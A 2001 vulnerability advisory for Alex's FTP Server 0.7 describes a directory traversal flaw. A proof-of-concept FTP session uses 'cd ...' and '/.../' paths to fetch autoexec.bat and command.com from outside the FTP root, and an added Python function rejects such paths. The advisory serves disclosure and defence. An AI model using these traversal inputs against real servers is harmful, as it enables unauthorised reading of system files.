Reported April 28, 2001, by Joe Testa.
VERSION AFFECTED
Alex’s FTP Server 0.7 for Windows 2000, Windows NT, and Windows 9x
DESCRIPTION
A vulnerability exists that lets an attacker break out of an FTP root. For
example, an attacker can access the root directory where the FTP server is
running by connecting to a vulnerable host and issuing the command "cd ...". An
attacker can also use relative paths to download files outside of an FTP root.
DEMONSTRATION
Joe Testa provided the following proof-of-concept scenario:
The following is an illustration of the problem. An ftp root of
'c:\directory\directory' was used:
Connected to xxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connection for retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" is current directory
ftp> get command.com
200 Port command okay
150 Opening data connection for retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
ftp>
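A server-side path check that rejects the two requests shown in the session above, as an added example that is not part of the original advisory and is not code from Alex's FTP Server. The names resolve, allowed and PathEscape are hypothetical, and readme.txt and /pub are constructed sample inputs; only the FTP root and the "..." paths come from the demonstration.

```python
import ntpath  # Windows path rules, usable on any OS

FTP_ROOT = r"c:\directory\directory"  # FTP root from the advisory's demonstration


class PathEscape(Exception):
    """Raised when a client path would leave the FTP root."""


def resolve(root, cwd, requested):
    """Map a client-supplied FTP path to a local path confined to root."""
    req = requested.replace("\\", "/")  # Windows accepts both separators
    virtual = req if req.startswith("/") else cwd.rstrip("/") + "/" + req
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape(requested)  # ".." above the virtual root
            parts.pop()
            continue
        # Win32 drops trailing dots and spaces from a component, so check
        # the name the file system will actually see.
        name = comp.rstrip(". ")
        if name == "" or ":" in name:
            # "" covers "...", "....", ". ." ; ":" covers drives and streams
            raise PathEscape(requested)
        parts.append(name)
    local = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the canonical result must still sit under root.
    base = ntpath.normcase(ntpath.normpath(root))
    found = ntpath.normcase(local)
    if found != base and not found.startswith(base + "\\"):
        raise PathEscape(requested)
    return local


def allowed(cwd, requested, root=FTP_ROOT):
    """True if the request stays inside root, False if it is rejected."""
    try:
        resolve(root, cwd, requested)
        return True
    except PathEscape:
        return False
```

The component loop does the real work; the final prefix comparison is a second barrier in case a later change to the parsing lets an unexpected form through.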
VENDOR RESPONSE
The vendor, Alex Linde, has been notified. However, no workaround or fix is currently available.
CREDIT
Discovered by Joe Testa.